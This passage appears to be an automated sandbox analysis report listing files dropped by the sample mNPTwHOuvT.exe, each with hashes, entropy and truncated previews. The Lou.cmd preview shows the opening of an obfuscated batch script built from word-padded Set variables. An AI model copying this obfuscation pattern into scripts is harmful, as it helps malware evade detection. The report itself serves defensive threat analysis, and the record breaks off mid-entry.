                                                                                                                                                                                                                                                                                                                          Preview:K..z..]5.].!j..q.-I.a.H..{.".....m|.,.N....Ki..X..N....gm.;..JUi.>.....2..2...C0~...i..?..[....P.kO..w.....y.Z....3\.#D...j..4.g...6...3N.6..%P...j...G.B.[}&............(.".......OX...^.....]5..k.....1$.P.dc2.S.AK.U..\.T....>.~.Ikw=..:.GM.I..r..F...>.I_$.(../6.0.N...>..@..J.P.7.m.r.L...`ni..!]nS.+:..p7p...F...L.....^@..r&.....].....0....6.I.k.^I..jRo...AI............<$..,d..6B}M. ...-..,.`.p..RH..-...W......0c......#..).<K.|.4i.}.@.W.*s].di}...<c...,...C.(.X41..@..M...>..=+...s|=..|..4.G08.SZ.~...CO...\..M6...?<..........b...5.|#0-y.. .......Wk.D.e.k.n.h.....1g.......f..8..i.zP.vb.~..\Y..V..QD{.......L.\..G|@\V..M...H.S]E.p.....V.vu.....B.e........W..O.c.z.t?tx....*=.d=..=.....ED.g..c!..r.&'....)n._..w..^..h...0.WQ.(.....3%30.d..sJ.!....^.,.$-x.*E..7..'%+h.8.<aKN....#t.'........i..._rng..+.d.....j.L"0..m@...q....n2.[.JI8....:.P....GO..._.....]z..rj..M.g...... ..pw......3{bRW.^.%..K.9..!.....G.\..IX.U.3/\.@IhH..<.M.=.m.......n(c.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Kinase

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):63488
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.571938928420122
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:Hn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMm3:H+AqVnBypIbv18mLthfhnueoMm3
                                                                                                                                                                                                                                                                                                                          MD5:CDABA79081FA6D641A98A3E9973CFB8C
                                                                                                                                                                                                                                                                                                                          SHA1:ADC52FE9CB7CA8ED553A22A54E3B3317FBD84347
                                                                                                                                                                                                                                                                                                                          SHA-256:A495934AC794C9B92F16BF2DBC45C2291D36C1B2187A18C4E9CB1842308831F6
                                                                                                                                                                                                                                                                                                                          SHA-512:47D7894955153F23D73A5DD1D8E8F9265822C74F15495271642E83AC7D6191261FF9F6853926CC5749DB91B758BD5A568985CDB6A1185D9E6601F4E31F28FED9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:N..I..v....E....v..N..I..Qi....3..V.P.u..J..2S.M...P...E...P.`....u......F'...>3._.F.....^[]...U..QSVW.}.3..E......]..w...t..G.........E....v..O..I..........v..O..I...h.....E.PS.u..G..._^3.[....U....SV.u..M.W.~......].3..M.....E......E..&...#..C........v..F..H..r....E....v..F..H..y.........Ch...E....v(.F..X..{..u{...m....E.;C.t..s....t....]....v..F..H.......E....v..F..H..............N........E.QQ..$P.u..E..u.PW.........%...C......3.M......_^3.[....U..V.u.W3..~..v..F..H..g.....N..1.......N....PPWPj.P.1.R...u.......%...>3._.F.....^]...U..SV.u.3.W....F....v..F..H..(g....F....v..F..H..%......N..1...J....N.j.j.SW.1j.j...R...u.......%...>3._.F.....^[]...U..SV.u.3.W....F....v..F..H..f....F....v..F..H........N.SW......P......u......$...>3._.F.....^[]...U..E.3.9H.v..@....Tf....=.)M..u.V.u....c$...&..F.....^..Q..(M..b..3.]...U..V.u.W....~..v..F..H.........N.....e..WP.O....u.......$...>3._.F.....^]...U......<SV3.W.=,%M.F.|$.;........=g#M........3.t$D...,%M..\$8.\$@.\$..\$ .t

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Logging

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:DOS executable (COM)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):94208
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.603392667759479
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:G8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTR:G80PtCZEMnVIPPBxT/sZydTmRxlHS3NX
                                                                                                                                                                                                                                                                                                                          MD5:BE7A18D476261EB3209931818C38C42A
                                                                                                                                                                                                                                                                                                                          SHA1:D097C4E1E31F858ACC8D6E67BDA2942690FDCE7B
                                                                                                                                                                                                                                                                                                                          SHA-256:BF51600F92C483C8FBB600F73D161662AA6FD932AD0EA8F054489C4788DECE93
                                                                                                                                                                                                                                                                                                                          SHA-512:C62F36D5862A5B2A766A60E1EC3E98BCF0DA64D7AA9634EA8A63C05EDE72290F6D46CE2642BA0C433981F8D1FC8901BFC5E2C878074AA1F493521FC05DDA58F3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.*....E.j.X.u..E....E....E.S.U..M......u.j..u..u.S......M....P.E.....PVWS....I......E.j.X.u..E....E....E.S.U..M..4....u.j..u..u.S.....M....P.E........M.A...+.P.A...+.PVWS....I..<...t+H...t..u......c....}..^.......P....E...G....u.VWS....I..U..M..0....E.9..)M...1...95.)M........ ...P....I..%.)M.......V....I...S............xH.......V.u.h8....]...t..T)M...................V.u.h4....6...t(.T)M............<...h...<...`.......X...V.u.h3....u...x.I..M.................u..E.P........4.I..E.Pj.h(...........H.I.........H.I..u....u.V..@.I....E.V........`.I....u..=.#M..u.j...j.....I....u..G...j..6..\.I......t.j...j.....I....#..........E.......~H.........<.u........<.......<.......<.......<................6..H.I.j...j.S..@.I......uM.......j.HPS..@.I......u4.......HPj.S..@.I......u........HP.......HPS..@.I...S.6..`.I........i....a...W.u.....I.j.W........8..)M.t.9..)M...2.....)M...tV..9.t..@...e...M.WSR...)M....)M....VQ...P......)M.....)M.....t.V..(M...............3.......E..[......t!I.....B

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Lou

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (337), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):8408
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.218294245961915
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:A3ZvggKNfAZX6bSx7KdsdHvMYK6yOL1DAgLeu2RoLOA3LSN8qXxBg:2CjNfuX6bfYCm1heuzL72N8qX7g
                                                                                                                                                                                                                                                                                                                          MD5:22713AB537083D5651E134AD4CB6E091
                                                                                                                                                                                                                                                                                                                          SHA1:665E1D44797B85F17AC267B94B519349CDCC553F
                                                                                                                                                                                                                                                                                                                          SHA-256:B55BCBE8D53825BC127D6F5032DC10D3C68674602BA7A3B1EC496011508B1953
                                                                                                                                                                                                                                                                                                                          SHA-512:DEEAB54E73EE196495F76A634B2FA7E250369EFFE617BAB25F6A6EE451F455D018AEE913E5D0A590AAEB686598921B30350AC46C1AEB132600A896DFFE8E6308
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:Set Ci=J..apCompanion-Boundaries-..zmJun-Purchased-Yea-Narrative-Ez-Appointments-..fDAPolished-Whom-Bbs-Fallen-Recipes-Cigarettes-Components-..CWSeats-Running-Sentence-Wma-Voltage-Pee-..bwwReforms-Jr-Differently-Strings-Individual-Administrators-Premium-Ya-Section-..DNvBloggers-Tel-Informed-Variety-..pWKWCriticism-Search-Filme-Been-Secretariat-Skirts-Burner-Jane-Parish-..Set Saves=F..MBXhLose-Congressional-..FWbDR-Batman-Mls-Directories-..fyEngine-Circle-Salt-Answers-Candle-Searching-..CcxrSupporting-Different-Companies-Schedule-Keyboards-Wagon-Dsc-Bother-..ptKSonic-Observe-Cleveland-Represented-Really-Meals-..advzCrew-Adjustments-..kllCRally-Invision-Interface-Threatening-..Set Jack=c..nBBCop-..vvjRec-Animal-Uni-Say-Visitors-..CzXNv-Mexican-..SVLottery-Cleveland-Writers-Pin-Couple-Adopted-Survey-Mauritius-..FKCase-Latin-Acquired-..IEgProducts-Starting-Machine-Protect-Stud-Website-..Set Selected=Z..hNLawsuit-Oscar-Junior-..IzEffectiveness-..axConstraint-Patents-Hl-Although-..VKpMac-Roc

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Lou.cmd (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (337), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):8408
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.218294245961915
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:A3ZvggKNfAZX6bSx7KdsdHvMYK6yOL1DAgLeu2RoLOA3LSN8qXxBg:2CjNfuX6bfYCm1heuzL72N8qX7g
                                                                                                                                                                                                                                                                                                                          MD5:22713AB537083D5651E134AD4CB6E091
                                                                                                                                                                                                                                                                                                                          SHA1:665E1D44797B85F17AC267B94B519349CDCC553F
                                                                                                                                                                                                                                                                                                                          SHA-256:B55BCBE8D53825BC127D6F5032DC10D3C68674602BA7A3B1EC496011508B1953
                                                                                                                                                                                                                                                                                                                          SHA-512:DEEAB54E73EE196495F76A634B2FA7E250369EFFE617BAB25F6A6EE451F455D018AEE913E5D0A590AAEB686598921B30350AC46C1AEB132600A896DFFE8E6308
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:Set Ci=J..apCompanion-Boundaries-..zmJun-Purchased-Yea-Narrative-Ez-Appointments-..fDAPolished-Whom-Bbs-Fallen-Recipes-Cigarettes-Components-..CWSeats-Running-Sentence-Wma-Voltage-Pee-..bwwReforms-Jr-Differently-Strings-Individual-Administrators-Premium-Ya-Section-..DNvBloggers-Tel-Informed-Variety-..pWKWCriticism-Search-Filme-Been-Secretariat-Skirts-Burner-Jane-Parish-..Set Saves=F..MBXhLose-Congressional-..FWbDR-Batman-Mls-Directories-..fyEngine-Circle-Salt-Answers-Candle-Searching-..CcxrSupporting-Different-Companies-Schedule-Keyboards-Wagon-Dsc-Bother-..ptKSonic-Observe-Cleveland-Represented-Really-Meals-..advzCrew-Adjustments-..kllCRally-Invision-Interface-Threatening-..Set Jack=c..nBBCop-..vvjRec-Animal-Uni-Say-Visitors-..CzXNv-Mexican-..SVLottery-Cleveland-Writers-Pin-Couple-Adopted-Survey-Mauritius-..FKCase-Latin-Acquired-..IEgProducts-Starting-Machine-Protect-Stud-Website-..Set Selected=Z..hNLawsuit-Oscar-Junior-..IzEffectiveness-..axConstraint-Patents-Hl-Although-..VKpMac-Roc

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Mars

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):13429
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.986025434136987
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:+rev893Dxu9kKTljitPIYARQONiBQ/TU5scx:ZU9zx6jljitPARpAiUP
                                                                                                                                                                                                                                                                                                                          MD5:35AB97965ED21C93B90FB8236A2DE026
                                                                                                                                                                                                                                                                                                                          SHA1:619AD50307AE8E141E0911E4C1656931C94A0505
                                                                                                                                                                                                                                                                                                                          SHA-256:390A2909C28C2C8A5A9269905C2500EB93C069F3A3F9E663770FC452A877E26F
                                                                                                                                                                                                                                                                                                                          SHA-512:A1522F80DA3E6682F8DCEF9D0B4D1F0C3768E63E5F623C8087B1C017F74391A6C819C6EE4885C3656BB5BD6DBB24E4A8BD2EC2A6321ECA93F5A872A864DFD6ED
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:p.....X......"j...hm=+.~..X..U.....U!.....W.V..K(..t..+e.4p.kX....I.........a.*.]3....=.K..{.8m5.../..o.....$R..r..]..SMP.Gn.8r.?kC......)..[e./..h...-.V7.\.+..3..c#...Ex..z..VN...../....V.m..@..._$..w|.S|..c.6...R...e3.Lm=|(.......@!."g._..</_.k@......v.~ }...j>..[a..=...R.t...oF....4.....h.|y..&.."..B..F.U...c..5\+..(........vJ".4..1....g7..?...L.....6..B..;d....j......I..r.j.Qp..j.Z...v.Z..?+.-}..d.."......=.V(Q..m4.l~j..P....Q.]fu.].h..t...^..<..jl.<....z..w'.8=.?...Be._.......M....KW.qB#.9A.t*.GsC...~C..G..|.E.....4...c.0.X....2...{.....\.m...'.'=...i..Eb...(....r...JR.-..A..;..SO.#..J.s.J_....B.P.Y..`.c..x:a.,.U.*...M....../......./pb.t.[TM-....I.1.1/7&.:4#.8..}-.[t....zng..2..V........?..y.].*Y..5..z.c:._.-...H.J..0...hg~.NJ.w.4V...".....a.....M6v............m..~N.P...A..#....dMc........N..0.!...h..}....->.R. ..vo.N.....E.*...~f..R.p.^.R..M2-V.e.{N.y3.J......ny.f.......u.Rl\)..\...}..B...p.D`./czM..>.."<-....5y.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Obvious

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.8659894634372165
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ugRHM1zzhWE7QxZaR8gpJsWVycd0vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr50:fh6R8anHsWccd0vtmgMbFuz08Qukl0
                                                                                                                                                                                                                                                                                                                          MD5:E95592BE5A986764EF4BCD3D2279610D
                                                                                                                                                                                                                                                                                                                          SHA1:C5412DE07D209E2F540934A526E4A0DFDE743EF4
                                                                                                                                                                                                                                                                                                                          SHA-256:40EAC969BE23708C454170332FFB682FAE4667FA161580F6A50620BFB3F1E82C
                                                                                                                                                                                                                                                                                                                          SHA-512:33896D5EAB2081CD7F33EBD7D355BC73476A05FE2CC40904167BEF3AB6C3FC01671AF1D38F55AADC868D02523808865154C7A7C7A720F78D47DC3CC642BB18CF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.S.E.T.H.E.L.P.....F.I.L.E.G.E.T.P.O.S.....I.S.D.E.C.L.A.R.E.D.....T.C.P.C.O.N.N.E.C.T.....B.L.O.C.K.I.N.P.U.T.....S.T.D.E.R.R.R.E.A.D.....W.I.N.G.E.T.T.E.X.T.....M.O.U.S.E.W.H.E.E.L.....G.U.I.S.E.T.F.O.N.T.....S.T.R.I.N.G.L.E.F.T.....M.O.U.S.E.C.L.I.C.K.....T.R.A.Y.G.E.T.M.S.G.....G.U.I.S.E.T.I.C.O.N.....U.D.P.S.T.A.R.T.U.P.....S.T.D.O.U.T.R.E.A.D.....M.A.P.A.P.P.E.N.D...G.U.I.C.R.E.A.T.E...M.A.P.E.X.I.S.T.S...W.I.N.A.C.T.I.V.E...I.N.E.T.C.L.O.S.E...T.I.M.E.R.D.I.F.F...F.I.L.E.F.L.U.S.H...R.U.N.A.S.W.A.I.T...G.U.I.S.W.I.T.C.H...D.I.R.C.R.E.A.T.E...W.I.N.G.E.T.P.O.S...B.I.T.R.O.T.A.T.E...F.I.L.E.W.R.I.T.E...I.S.K.E.Y.W.O.R.D...G.U.I.G.E.T.M.S.G...S.T.R.I.N.G.M.I.D...O.B.J.C.R.E.A.T.E...M.O.U.S.E.M.O.V.E...T.C.P.L.I.S.T.E.N...G.U.I.D.E.L.E.T.E...B.I.N.A.R.Y.M.I.D...W.I.N.E.X.I.S.T.S...S.O.U.N.D.P.L.A.Y...M.O.U.S.E.D.O.W.N...M.A.P.R.E.M.O.V.E...F.I.L.E.C.L.O.S.E...B.I.N.A.R.Y.L.E.N...E.N.V.U.P.D.A.T.E...D.I.R.R.E.M.O.V.E...R.E.G.D.E.L.E.T.E...S.T.R.I.N.G.L.E.N...I.N.I.D.E.L.E.T.E...T.C.P

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Pensions

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):94208
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998364588537466
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:TQBIh0esmdr8TrSMjWohuSVpBpZ+1bcmmnYmgkNuAOB3vwGpowCxsnFfIroqu3ak:vh0eVr87ju8jpZW4mm2ouYGBCO+opqk
                                                                                                                                                                                                                                                                                                                          MD5:796CFAF0CEDB049BCA9B24E809EC0100
                                                                                                                                                                                                                                                                                                                          SHA1:8F919FE33168F0972FFE9F2C3290132DB321C1AF
                                                                                                                                                                                                                                                                                                                          SHA-256:1C3CEBBAB1616C3AF60D6A4729D0016192E1AA75FEA4A226CFDCCBB5EBE1A4B8
                                                                                                                                                                                                                                                                                                                          SHA-512:A857F807DFA3959ABC6E151BE7A20A86EA0A787AABBD4646B7F13F69CDC973C5EE92646DECF88356AC21A1F2EB086BF821961C141A6206E9E7966FCDFA7BF38A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:6....r.Y~XgYy.U......Yc..U43i.E.P.:.d.3LzB.he..K..rZ..t<...E.8.>...N..).M...->....n^c9.W.Z..'PJ`...Hw...A..I.7..3.fl....n..0.K..~L.."Sa.)f.....G....*al.?N..Rg...:..yG..d...F.r.2.e<<../.u....u}.B...i...=...m.iNB:!.m.<9Q..F.$..DV...qz.....:..1`..3.......S.3..........H..^C...tD..A.|.!....B.....t..VB,S8.P..s+.b........}.&:...........7.K.....A.-G...h{.fa`U,e.+]Oze..S.!..E.0..63/......2.?.$6ZF.lE...-8.-.....W_L]r...X}.J.^B{^v/......Y..hnj.!ag..x..{...I...s).......<..=...o.e:9..YX.y........9.|1..j.%..oG..K......66.....j_......H......DA...oP...(&g....jy..t.%..[,[0......x.d).H.s..=.?T..../...c.......=.4.xZ...pi...........@*Z...Gn13{.*.Q.nr...(..6...`..o<i.{U-.=}.P./..0.H.O@}..3.. Ia..#....9=H..e............H.X.g...@....'0..1....s.......]...5.."... ..zT~Gy.o1..X.'.j.h..Y ...`..C...3...W.......-...6.D....9...K....B4..}.....L.| .....5#Q5...l6....{r..7...."..\5gf~.r9..G..^.....1..3.? ..)..6<..?...=2c.......j=..g..-....]+nV6.d..i4..D.R.i..\....

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Pmid

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):67584
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5584423398312826
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:fKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:fKaj6iTcPAsAhxjgarB
                                                                                                                                                                                                                                                                                                                          MD5:861134FB36383C179CB03764F2CD12C8
                                                                                                                                                                                                                                                                                                                          SHA1:C6D2501212DA26C1F41A3FA8947EF2B7E4F28A47
                                                                                                                                                                                                                                                                                                                          SHA-256:F67E02B20EF188D69AC2EE61E93298D01D62A92EC7463897283782E0B3B79794
                                                                                                                                                                                                                                                                                                                          SHA-512:4F931B585CE1993D6439C9B9E1065EFF2555499E527BB1740133B07E0498A18FBB0FEB62A7B53BC5287C225E8CD8249D86AB51FA3E19A39C8106D2EA7D06DA1D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...............r.........r.r.................r...............r.........................................................r.........r...........r...r.r.r...............r.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r......................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Skins

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):81920
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.3980529493969165
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:+rrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfG:+qDoioO5bLezW9FfTut/Dde6u640ewy3
                                                                                                                                                                                                                                                                                                                          MD5:23DFC4CD924335264B4D6BB3844054FC
                                                                                                                                                                                                                                                                                                                          SHA1:F98112A81720C100737DCE6CFD5DFADE4098D424
                                                                                                                                                                                                                                                                                                                          SHA-256:7955120BAD73F2CDFCEAFE16739E3CC80D4BD69011FBB8919CE932DEB523483D
                                                                                                                                                                                                                                                                                                                          SHA-512:379BEF7B3A711DE3A943C30130AA9AB7534E9CBD7C9929E29AACD76CD194EB0A2B542BBB41B5E9095CB355605516CBC4585F4161B1744151CAB27C028923097E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.....J7.....@..|0...L0.t..I8Q.M.....3.^]...U..S.].VW.......{..v..C..H..3..........@.C....!.......:....uB..0.I....Q..|2...L2.t..I8.A..|2...D2.t..@8.u....@........&..F....._^3.[]...U...\SVW...M.....3..E.....j<Q.E..M.P.M..n...].....}..r3.C..p........F.3..f9.t..C..p........F.......E..}..r..K..q....|....F.......E..}..rC.K..q....\....F.3...f90t,.C.j).p....7.....u..8....E.;F.t..v....?...3..}..r..C..H..........E.j<.E.VP..m...E.....E..C..E.<....E.@....u..0........F..u..]....E..E.E..E.P.u..].....I..E...t.V.nH..Y..t.S.cH..Y.}..uB...H..|9...D9.t..@8.@......|9...D9.t..@8.u.3..X..A-...F........c.}..t..E..L....R.u.....-......}...F.....t8.u.....I..E..E...y.....L....]...,...E..u....F.......`.I..M......_^3.[....U..S.].W...C.........t.......u.2..P.C.V.0........4...;N.t..v......}..^u..C..H..X...i.......3...D.......I...H....._[]...U.........SVWjD^V3.L$0.D$tSP.3l......t$p3..\$(@.\$..}....j..\$..\$(.\$$.]...$....f..$....^t<.C..H.......{...D$$v[.C..H........C........H........L$ .+.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Spell

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):89088
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9981467332246
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:UFUqeOY/S/PwYG+JLkMhPaR1cJKUWOIRIrZsfh6i/W9gUU+GmBeKlHcAeqLmk:G3iwoYG+Rjc+ku6fBbX0egH7Lmk
                                                                                                                                                                                                                                                                                                                          MD5:7B94AB97BEFB9AB968A7DB298D98892D
                                                                                                                                                                                                                                                                                                                          SHA1:5D21AEE41F5F3EC7B54D4C60315FFFE0C6FD4FF0
                                                                                                                                                                                                                                                                                                                          SHA-256:EF44E8D7076638218844F0E7AA379E972EFEA1B4E32999A3981696752FD26DD0
                                                                                                                                                                                                                                                                                                                          SHA-512:4BA84CE4CC80948147685ED098042F21C962714F6F4ECE8BD099077898470F1C10DBCC3D7EEEC84CDBBEBE00E37D64390105652D60976029AD51807CCD0AC213
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:..$d.E.....g......=Q..<2..'..(...fK..J..nX.....%F"..x..........]q...].1k.u\..k.!.N...t..N.X9...-.0.^...L.M...z...c..-..Z...,...4k....R..oJ..fJ.r.}..k.%k..>......O[...2`->.KA..l.......h.3..I......b...7r....%..kH.^N.hCL.2=.v.K5..<.m...4Z....._..p...Xw...*@..;.^.'I&..]h.....mc,.D..\........T..-.f9../......n....|.\...5...B./.q....Ol...@5."...l.<.>(*.wk..g.`cW0..."2...\x/..1...,....m.;4i.A-..N....$!a.^a.j..C'.*......).V.o...2.WS.......4........{%..b.A...].G@...1.i..~....|.V....0.]+Hn..>.....UR^.~+.`&...C....N.:.3.f.E.o4.>......<..L...,.....*.(.w....r^_tz.^....n..C.0.....`R...>....G......fe...h...F3..3iC-.......h.&..s.G..a`...}r.$;oH.u..JPp3...Q..^~iS....JR...u..r...._..l.5....&zV'o......m..z1;.{..{Y..}...W.r.P.%...........YE!.JY...5oP.3M...<i..c...w...y........M..W..I..hR.m..DR.t..\..u..+C.......k0.. .i..gL..j7h~VA..[@o...q8...:'rd....gL......e......f&...].g.}..=..E.&w.V'.N........K.6..\C..>ULEL.U..... ......k.m.Z=[N..-.|.5........B..`c_}...N.R.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Too

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):124928
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.692375664403762
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:wcBiqXvpgF4qv+32eOyKODOSpQSAU4CE0ImbT:wcB3gBmmLsiS+SAhClbT
                                                                                                                                                                                                                                                                                                                          MD5:1A086A7F4690C073C0BC3E71EA9C5F22
                                                                                                                                                                                                                                                                                                                          SHA1:2E52D452CBA7BBB3BAD7163E5C6197F86CC8D2B2
                                                                                                                                                                                                                                                                                                                          SHA-256:A25BC1EDC42946646E106FF320E0359AE502BD5C45BAEDEFA11B9FCDA14454BB
                                                                                                                                                                                                                                                                                                                          SHA-512:413FDBD805125B01F2B37703B8BA58960051E9E7F7EA48514FBD69E4B27BC0F56682C36F0BAF649FFD4F7788B3538730C7303FE8D42F9EB60BF0B70FA6D71686
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:Q..R.9Q.u.......I.SQ.0.L....I.SQ.0.L..L$..K..C..k.UQPXY]Y[......V.....p...t.......I........U..E..M..x.........A.].A.].U..E..M..H.].j.h..L.......E...tt.8csm.ul.x..uf.x. ...t..x.!...t..x."...uK.H...tD.Q...t..e..R.p..I....E......'3.8E........t..@.....t...Q.p.......I...M.d......Y_^[..e.......U..M..U.]...U.......@$..t..M.9.t..@...u.3.@].3.].U..M..U.V...q....x..I...........^].U..E....8RCC.t..8MOC.t..8csm.u!.1....`...;....#....x..~.......H.3.]..U..E.f.....f..u.+E...H]..E.....U..E..U.V..+....f....R.f..u.^]..U..W...M..G....t....G..A......M...u....L..G....L..G..DV.....W...R.w..HL...HHP.......V.7............P...^..u......P....G...._].....U...M...uu.U...u...................].M...t.SVWjA_jZ+.[....f;.r.f;.w... ..........f;.r.f;.w... ......f..t.f;.t...._...^+.[].j..u..u.........]..U.....M.SV.u.......]...t..u...u...........................E.W.......uBjAYjZ+.Z...3f;.r.f;.w... ..........f;.r.f;.w... ......f..t:f;.t..3....M.QP....M........[.QP..........v.f..t.f;.t.......+._

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Walker

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):74752
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.454851984923921
                                                                                                                                                                                                                                                                                                                          Encrypted:false
